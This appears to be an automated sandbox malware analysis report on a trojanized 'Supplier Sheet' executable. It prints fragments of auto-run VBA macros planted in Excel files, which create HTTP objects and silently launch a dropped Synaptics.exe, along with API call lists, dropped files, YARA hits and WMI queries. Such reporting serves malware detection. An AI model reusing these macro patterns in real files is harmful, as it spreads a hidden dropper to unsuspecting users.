                                Source: zWdpyzM9.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: zWdpyzM9.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: GLTYDMDUST.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: GLTYDMDUST.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: GLTYDMDUST.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: GLTYDMDUST.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: GLTYDMDUST.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: GLTYDMDUST.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: GLTYDMDUST.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: GLTYDMDUST.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: GLTYDMDUST.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: zWdpyzM9.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: GLTYDMDUST.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: zWdpyzM9.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: GLTYDMDUST.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: zWdpyzM9.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: GLTYDMDUST.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                                Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00D729C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00D729C2
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DE02AA NtdllDialogWndProc_W,2_2_00DE02AA
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDE769 NtdllDialogWndProc_W,CallWindowProcW,2_2_00DDE769
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_00DDEAA6
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDEA4E NtdllDialogWndProc_W,2_2_00DDEA4E
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00D8AC99 NtdllDialogWndProc_W,2_2_00D8AC99
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_00DDECBC
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00D8AD5C NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,2_2_00D8AD5C
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00D8AFB4 GetParent,NtdllDialogWndProc_W,2_2_00D8AFB4
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_00DDEFA8
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDF0A1 SendMessageW,NtdllDialogWndProc_W,2_2_00DDF0A1
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_00DDF122
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDF3DA NtdllDialogWndProc_W,2_2_00DDF3DA
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDF3AB NtdllDialogWndProc_W,2_2_00DDF3AB
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDF37C NtdllDialogWndProc_W,2_2_00DDF37C
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDF45A ClientToScreen,NtdllDialogWndProc_W,2_2_00DDF45A
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDF425 NtdllDialogWndProc_W,2_2_00DDF425
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDF594 GetWindowLongW,NtdllDialogWndProc_W,2_2_00DDF594
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00D8B7F2 NtdllDialogWndProc_W,2_2_00D8B7F2
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00D8B845 NtdllDialogWndProc_W,2_2_00D8B845
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDFE80 NtdllDialogWndProc_W,2_2_00DDFE80
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDFE7D NtdllDialogWndProc_W,2_2_00DDFE7D
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_00DDFF91
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DDFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,2_2_00DDFF04
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_008F29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,9_2_008F29C2
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_009602AA NtdllDialogWndProc_W,9_2_009602AA
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095E769 NtdllDialogWndProc_W,CallWindowProcW,9_2_0095E769
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,9_2_0095EAA6
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095EA4E NtdllDialogWndProc_W,9_2_0095EA4E
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0090AC99 NtdllDialogWndProc_W,9_2_0090AC99
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,9_2_0095ECBC
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0090AD5C NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,9_2_0090AD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0090AFB4 GetParent,NtdllDialogWndProc_W,9_2_0090AFB4
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,9_2_0095EFA8
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095F0A1 SendMessageW,NtdllDialogWndProc_W,9_2_0095F0A1
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,9_2_0095F122
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095F3AB NtdllDialogWndProc_W,9_2_0095F3AB
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095F3DA NtdllDialogWndProc_W,9_2_0095F3DA
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095F37C NtdllDialogWndProc_W,9_2_0095F37C
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095F425 NtdllDialogWndProc_W,9_2_0095F425
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095F45A ClientToScreen,NtdllDialogWndProc_W,9_2_0095F45A
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095F594 GetWindowLongW,NtdllDialogWndProc_W,9_2_0095F594
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0090B7F2 NtdllDialogWndProc_W,9_2_0090B7F2
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0090B845 NtdllDialogWndProc_W,9_2_0090B845
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095FE80 NtdllDialogWndProc_W,9_2_0095FE80
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095FE7D NtdllDialogWndProc_W,9_2_0095FE7D
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,9_2_0095FF91
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe Code function: 9_2_0095FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,9_2_0095FF04
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DB70AE: CreateFileW,DeviceIoControl,CloseHandle,2_2_00DB70AE
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Code function: 2_2_00DAB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74F25590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,2_2_00DAB9F1
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00DB82D0
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009382D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,9_2_009382D0
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCXC902.tmp 7D8C783C45AFF23E64E6E801C0F988002078A0E8DA5F85285BB335F997E7E50D
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: String function: 00D8F885 appears 68 times
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: String function: 00D97750 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: String function: 0090F885 appears 68 times
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: String function: 00917750 appears 42 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 7800
                                Source: Supplier 0202AW-PER2 Sheet.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: Supplier 0202AW-PER2 Sheet.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCXC902.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000000.1227187533.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235546842.0000000000735000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000002.1236440474.0000000000771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000002.1236440474.0000000000782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235546842.000000000072A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exeBinary or memory string: OriginalFileName vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exeBinary or memory string: OriginalFilenameb! vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@23/49@8/4
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBD712 GetLastError,FormatMessageW,2_2_00DBD712
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DAB8B0 AdjustTokenPrivileges,CloseHandle,2_2_00DAB8B0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DABEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00DABEC3
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0092B8B0 AdjustTokenPrivileges,CloseHandle,9_2_0092B8B0
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0092BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_0092BEC3
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_00DBEA85
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_00DB6F5B
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBEFCD CoInitialize,CoCreateInstance,CoUninitialize,2_2_00DBEFCD
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D731F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_00D731F2
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile created: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
                                Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7412
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeFile created: C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs
                                Source: Yara matchFile source: Supplier 0202AW-PER2 Sheet.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Supplier 0202AW-PER2 Sheet.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXC902.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
